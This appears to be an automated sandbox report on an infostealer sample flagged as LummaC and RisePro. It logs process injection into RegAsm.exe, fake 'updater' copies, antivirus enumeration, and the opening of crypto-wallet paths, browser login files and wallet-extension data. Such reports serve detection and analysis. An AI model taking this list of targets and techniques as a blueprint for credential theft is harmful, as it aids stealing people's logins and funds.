Source: C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: E76008	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 43B000	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 43F000	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 452000	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: C48008	Jump to behavior
Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 43B000
Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 43F000
Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 452000
Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 11B6008
Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 43B000
Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 43F000
Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 452000
Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 9CC008

Source: C:\Users\user\Desktop\tMO4FVIc9l.exe	Process created: C:\Users\user\AppData\Local\Temp\spanDxygJpUhAdhw\xq6J5KlULX6jlR3rET0T.exe "C:\Users\user\AppData\Local\Temp\spanDxygJpUhAdhw\xq6J5KlULX6jlR3rET0T.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\spanDxygJpUhAdhw\xq6J5KlULX6jlR3rET0T.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

Source: C:\Users\user\Desktop\tMO4FVIc9l.exe

Code function: 0_2_00A14699 cpuid

0_2_00A14699

Source: C:\Users\user\AppData\Local\Temp\spanDxygJpUhAdhw\xq6J5KlULX6jlR3rET0T.exe	Code function: EnumSystemLocalesW,	7_2_004F70F4
Source: C:\Users\user\AppData\Local\Temp\spanDxygJpUhAdhw\xq6J5KlULX6jlR3rET0T.exe	Code function: EnumSystemLocalesW,	7_2_004F70A9
Source: C:\Users\user\AppData\Local\Temp\spanDxygJpUhAdhw\xq6J5KlULX6jlR3rET0T.exe	Code function: EnumSystemLocalesW,	7_2_004F718F
Source: C:\Users\user\AppData\Local\Temp\spanDxygJpUhAdhw\xq6J5KlULX6jlR3rET0T.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	7_2_004F721A
Source: C:\Users\user\AppData\Local\Temp\spanDxygJpUhAdhw\xq6J5KlULX6jlR3rET0T.exe	Code function: GetLocaleInfoW,	7_2_004EF305
Source: C:\Users\user\AppData\Local\Temp\spanDxygJpUhAdhw\xq6J5KlULX6jlR3rET0T.exe	Code function: GetLocaleInfoW,	7_2_004F746D
Source: C:\Users\user\AppData\Local\Temp\spanDxygJpUhAdhw\xq6J5KlULX6jlR3rET0T.exe	Code function: EnumSystemLocalesW,	7_2_004EEDDF
Source: C:\Users\user\AppData\Local\Temp\spanDxygJpUhAdhw\xq6J5KlULX6jlR3rET0T.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	7_2_004F7596
Source: C:\Users\user\AppData\Local\Temp\spanDxygJpUhAdhw\xq6J5KlULX6jlR3rET0T.exe	Code function: GetACP,IsValidCodePage,GetLocaleInfoW,	7_2_004F6E07
Source: C:\Users\user\AppData\Local\Temp\spanDxygJpUhAdhw\xq6J5KlULX6jlR3rET0T.exe	Code function: GetLocaleInfoW,	7_2_004F769C
Source: C:\Users\user\AppData\Local\Temp\spanDxygJpUhAdhw\xq6J5KlULX6jlR3rET0T.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	7_2_004F776B
Source: C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exe	Code function: EnumSystemLocalesW,	9_2_00C070F4
Source: C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exe	Code function: EnumSystemLocalesW,	9_2_00C070A9
Source: C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exe	Code function: EnumSystemLocalesW,	9_2_00C0718F
Source: C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	9_2_00C0721A
Source: C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exe	Code function: GetLocaleInfoW,	9_2_00BFF305
Source: C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exe	Code function: GetLocaleInfoW,	9_2_00C0746D
Source: C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	9_2_00C07596
Source: C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exe	Code function: EnumSystemLocalesW,	9_2_00BFEDDF
Source: C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exe	Code function: GetLocaleInfoW,	9_2_00C0769C
Source: C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exe	Code function: GetACP,IsValidCodePage,GetLocaleInfoW,	9_2_00C06E07
Source: C:\ProgramData\MSIUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\MSIUpdaterV202.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	9_2_00C0776B
Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exe	Code function: EnumSystemLocalesW,	17_2_00EA70F4
Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exe	Code function: EnumSystemLocalesW,	17_2_00EA70A9
Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exe	Code function: EnumSystemLocalesW,	17_2_00EA718F
Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	17_2_00EA721A
Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exe	Code function: GetLocaleInfoW,	17_2_00E9F305
Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exe	Code function: GetLocaleInfoW,	17_2_00EA746D
Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exe	Code function: EnumSystemLocalesW,	17_2_00E9EDDF
Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	17_2_00EA7596
Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exe	Code function: GetLocaleInfoW,	17_2_00EA769C
Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exe	Code function: GetACP,IsValidCodePage,GetLocaleInfoW,	17_2_00EA6E07
Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	17_2_00EA776B
Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exe	Code function: EnumSystemLocalesW,	20_2_00EA70F4
Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exe	Code function: EnumSystemLocalesW,	20_2_00EA70A9
Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exe	Code function: EnumSystemLocalesW,	20_2_00EA718F
Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	20_2_00EA721A
Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exe	Code function: GetLocaleInfoW,	20_2_00E9F305
Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exe	Code function: GetLocaleInfoW,	20_2_00EA746D
Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exe	Code function: EnumSystemLocalesW,	20_2_00E9EDDF
Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	20_2_00EA7596
Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exe	Code function: GetLocaleInfoW,	20_2_00EA769C
Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exe	Code function: GetACP,IsValidCodePage,GetLocaleInfoW,	20_2_00EA6E07
Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	20_2_00EA776B

Source: C:\Users\user\Desktop\tMO4FVIc9l.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Users\user\Desktop\tMO4FVIc9l.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Source: C:\Users\user\Desktop\tMO4FVIc9l.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\tMO4FVIc9l.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Users\user\AppData\Local\Temp\spanDxygJpUhAdhw\xq6J5KlULX6jlR3rET0T.exe

Code function: 7_2_004E4C60 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

7_2_004E4C60

Source: C:\Users\user\Desktop\tMO4FVIc9l.exe

Code function: 0_2_00AA623D GetTimeZoneInformation,TzSpecificLocalTimeToSystemTime,RegOpenKeyExA,

0_2_00AA623D

Source: C:\Users\user\Desktop\tMO4FVIc9l.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: Amcache.hve.15.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.15.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.15.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.15.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: RegAsm.exe, 00000008.00000002.2350449893.00000000009A6000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000008.00000002.2350449893.00000000009C0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000015.00000002.2456519007.0000000001505000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000019.00000002.2498499806.0000000000C1A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: Amcache.hve.15.dr	Binary or memory string: MsMpEng.exe

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 6472, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 5920, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 500, type: MEMORYSTR

Yara detected RisePro Stealer

Source: Yara match	File source: 00000000.00000003.2155682026.0000000006044000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2259208520.000000000611B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: tMO4FVIc9l.exe PID: 3108, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\KBHGMwjOItm_DLNJJFRnML7.zip, type: DROPPED

Found many strings related to Crypto-Wallets (likely being stolen)

Source: RegAsm.exe, 00000008.00000002.2350449893.00000000009C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Electrum\wallets
Source: RegAsm.exe, 00000008.00000002.2350449893.00000000009C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: window-state.json
Source: RegAsm.exe, 00000008.00000002.2350449893.00000000009C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/JAXX New Version
Source: tMO4FVIc9l.exe, 00000000.00000002.2258511211.0000000001548000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: v\user\AppData\Roaming\Exodus\exodus.wallet
Source: tMO4FVIc9l.exe, 00000000.00000002.2258511211.0000000001548000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: v\user\AppData\Roaming\Exodus\exodus.wallet
Source: RegAsm.exe, 00000008.00000002.2350449893.00000000009C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/Ethereum
Source: RegAsm.exe, 00000008.00000002.2350449893.00000000009C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: RegAsm.exe, 00000008.00000002.2350449893.00000000009C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: keystore
Source: RegAsm.exe, 0000000C.00000002.2244993517.000000000118F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\Ledger Live

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\tMO4FVIc9l.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm\CURRENT	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\logins.json
Source: C:\Users\user\Desktop\tMO4FVIc9l.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih\CURRENT	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cert9.db
Source: C:\Users\user\Desktop\tMO4FVIc9l.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj\CURRENT	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
Source: C:\Users\user\Desktop\tMO4FVIc9l.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao\CURRENT	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
Source: C:\Users\user\Desktop\tMO4FVIc9l.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln\CURRENT	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
Source: C:\Users\user\Desktop\tMO4FVIc9l.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj\CURRENT	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
